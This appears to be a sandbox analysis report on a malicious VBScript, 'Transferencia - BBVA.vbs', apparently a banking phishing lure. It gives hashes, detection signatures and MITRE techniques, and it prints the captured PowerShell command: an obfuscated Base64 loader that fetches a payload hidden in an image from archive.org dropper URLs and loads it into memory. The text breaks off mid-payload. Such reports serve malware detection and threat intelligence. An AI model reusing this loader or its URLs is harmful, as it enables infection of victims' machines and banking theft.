8b2dd1fa4daceba13b67a0f43098e3a1bc22120536ca0dea4513a697bc6d82b1

General

Target

Transferencia - BBVA.vbs
Size

711KB
MD5

61288a7ecc1674e16c5c18eb5090c4a7
SHA1

b04ff4ee075f71ae3aeaeea3e64ddffa57a8bd8a
SHA256

8b2dd1fa4daceba13b67a0f43098e3a1bc22120536ca0dea4513a697bc6d82b1
SHA512

2c87f2526403e553efa5c4c06e49f039c10305129dce60b382193bc301b914aceee09763b8080a28268b0cfc9d25848ffcc5f5282a05148d2a04ba63957b3abd
SSDEEP

12288:LEW2okXA9fjCS2QssJWtmECjKlWOFZ73g97s15uDjgh/OmRag6OxHW2OwxK+p+kh:LMh7/gEJU/+g30

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1864	powershell.exe
6	1864	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1048	powershell.exe
1864	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1048	powershell.exe
1864	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 1048	2564	WScript.exe	29
PID 2564 wrote to memory of 1048	2564	WScript.exe	29
PID 2564 wrote to memory of 1048	2564	WScript.exe	29
PID 1048 wrote to memory of 1864	1048	powershell.exe	31
PID 1048 wrote to memory of 1864	1048	powershell.exe	31
PID 1048 wrote to memory of 1864	1048	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transferencia - BBVA.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌VQBy♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBo♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bw♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌Og♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌aQBh♶ ━ ⢚ ⬑ ⾌Dg♶ ━ ⢚ ⬑ ⾌M♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌z♶ ━ ⢚ ⬑ ⾌DE♶ ━ ⢚ ⬑ ⾌M♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌dQBz♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌YQBy♶ ━ ⢚ ⬑ ⾌GM♶ ━ ⢚ ⬑ ⾌a♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌cgBn♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌3♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌aQB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBz♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌dgBi♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌Xw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Nw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌Xw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌Nw♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌LwB2♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌cw♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌c♶ ━ ⢚ ⬑ ⾌Bn♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Hc♶ ━ ⢚ ⬑ ⾌ZQBi♶ ━ ⢚ ⬑ ⾌EM♶ ━ ⢚ ⬑ ⾌b♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bgB0♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌E4♶ ━ ⢚ ⬑ ⾌ZQB3♶ ━ ⢚ ⬑ ⾌C0♶ ━ ⢚ ⬑ ⾌TwBi♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌BT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌E4♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌VwBl♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌QwBs♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌B3♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌YgBD♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌aQBl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌EQ♶ ━ ⢚ ⬑ ⾌bwB3♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌b♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BE♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌Cg♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌VQBy♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌aQBt♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌ZwBl♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌LgBF♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌aQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌VQBU♶ ━ ⢚ ⬑ ⾌EY♶ ━ ⢚ ⬑ ⾌O♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ec♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌FM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌By♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bgBn♶ ━ ⢚ ⬑ ⾌Cg♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌QgB5♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌ZQBz♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌P♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌8♶ ━ ⢚ ⬑ ⾌EI♶ ━ ⢚ ⬑ ⾌QQBT♶ ━ ⢚ ⬑ ⾌EU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌F8♶ ━ ⢚ ⬑ ⾌UwBU♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌UgBU♶ ━ ⢚ ⬑ ⾌D4♶ ━ ⢚ ⬑ ⾌Pg♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌P♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌8♶ ━ ⢚ ⬑ ⾌EI♶ ━ ⢚ ⬑ ⾌QQBT♶ ━ ⢚ ⬑ ⾌EU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌F8♶ ━ ⢚ ⬑ ⾌RQBO♶ ━ ⢚ ⬑ ⾌EQ♶ ━ ⢚ ⬑ ⾌Pg♶ ━ ⢚ ⬑ ⾌+♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bp♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌V♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌BP♶ ━ ⢚ ⬑ ⾌GY♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBU♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌B0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌E8♶ ━ ⢚ ⬑ ⾌Zg♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌RgBs♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Zw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bz♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌YQBy♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBn♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌w♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQBn♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌r♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BG♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌YQBn♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌ZwB0♶ ━ ⢚ ⬑ ⾌Gg♶ ━ ⢚ ⬑ ⾌Ow♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌YQBz♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Ng♶ ━ ⢚ ⬑ ⾌0♶ ━ ⢚ ⬑ ⾌Ew♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌PQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌ZQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQB4♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌LQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌cgB0♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌QwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌ZQBU♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌e♶ ━ ⢚ ⬑ ⾌B0♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌UwB1♶ ━ ⢚ ⬑ ⾌GI♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌aQBu♶ ━ ⢚ ⬑ ⾌Gc♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bh♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BJ♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌Hg♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌ZwB0♶ ━ ⢚ ⬑ ⾌Gg♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌EM♶ ━ ⢚ ⬑ ⾌bwBu♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌ZQBy♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌RgBy♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌bQBC♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌DY♶ ━ ⢚ ⬑ ⾌N♶ ━ ⢚ ⬑ ⾌BT♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌cgBp♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Zw♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YgBh♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌2♶ ━ ⢚ ⬑ ⾌DQ♶ ━ ⢚ ⬑ ⾌QwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bs♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌YQBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BB♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌YgBs♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌9♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌WwBT♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌cwB0♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌FI♶ ━ ⢚ ⬑ ⾌ZQBm♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQBv♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌LgBB♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌cwBl♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ 